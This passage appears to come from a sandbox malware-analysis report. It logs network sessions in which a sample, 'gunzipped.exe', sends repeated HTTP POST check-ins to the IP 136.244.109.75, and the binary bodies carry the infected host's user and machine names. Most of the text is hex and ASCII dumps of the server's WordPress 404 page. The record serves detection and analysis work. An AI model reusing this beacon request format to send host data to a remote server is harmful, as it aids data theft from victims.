20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:15.817534924 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:15.817575932 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:15.817615986 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:15.817656040 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:15.817698956 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:15.817739964 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:15.817778111 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:15.817816019 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:15.817853928 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.549728136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:16.164911985 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:16.368056059 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:17.295049906 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:16 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:17.295114040 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:17.295152903 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:17.295191050 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:17.295233965 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:17.295270920 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:17.295309067 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:17.295347929 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:17.295392036 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:17.295439005 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.549729136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:17.652364016 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:17.860613108 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:18.792915106 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:17 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
